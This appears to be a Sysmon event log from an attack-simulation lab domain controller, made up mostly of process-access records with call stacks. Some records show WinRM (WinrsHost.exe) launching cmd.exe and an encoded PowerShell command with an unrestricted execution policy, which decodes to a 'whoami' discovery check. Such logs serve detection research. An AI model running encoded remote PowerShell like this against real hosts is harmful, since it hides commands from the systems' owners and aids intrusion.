08:41:58.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002688Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002687Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002686Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002685Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002684Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002683Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002682Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.089{5D479F2C-169F-5F84-0500-000000007F01}648796C:\Windows\system32\csrss.exe{5D479F2C-16D6-5F84-7E00-000000007F01}5016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002681Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.089{5D479F2C-169F-5F84-0B00-000000007F01}8644084C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002680Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.089{5D479F2C-16D6-5F84-7D00-000000007F01}50045008C:\Windows\system32\cmd.exe{5D479F2C-16D6-5F84-7E00-000000007F01}5016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002679Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.089{5D479F2C-169F-5F84-0B00-000000007F01}8644084C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002678Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.092{5D479F2C-16D6-5F84-7E00-000000007F01}5016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkAC:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-16D6-5F84-ACD0-040000000000}0x4d0ac0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5D479F2C-16D6-5F84-7D00-000000007F01}5004C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA 10341000x80000000000000002677Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.089{5D479F2C-169F-5F84-0B00-000000007F01}8644084C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002676Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.073{5D479F2C-16D6-5F84-7C00-000000007F01}49404960C:\Windows\system32\conhost.exe{5D479F2C-16D6-5F84-7D00-000000007F01}5004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002675Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.073{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002674Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.073{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002673Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.073{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002672Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.073{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002671Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.073{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002670Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.073{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002669Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.073{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002668Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.073{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002667Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.073{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002666Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.073{5D479F2C-169F-5F84-0500-000000007F01}648664C:\Windows\system32\csrss.exe{5D479F2C-16D6-5F84-7D00-000000007F01}5004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002665Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.073{5D479F2C-16D6-5F84-7B00-000000007F01}49284984C:\Windows\system32\WinrsHost.exe{5D479F2C-16D6-5F84-7D00-000000007F01}5004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb 154100x80000000000000002664Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.086{5D479F2C-16D6-5F84-7D00-000000007F01}5004C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkAC:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-16D6-5F84-ACD0-040000000000}0x4d0ac0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5D479F2C-16D6-5F84-7B00-000000007F01}4928C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000002663Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 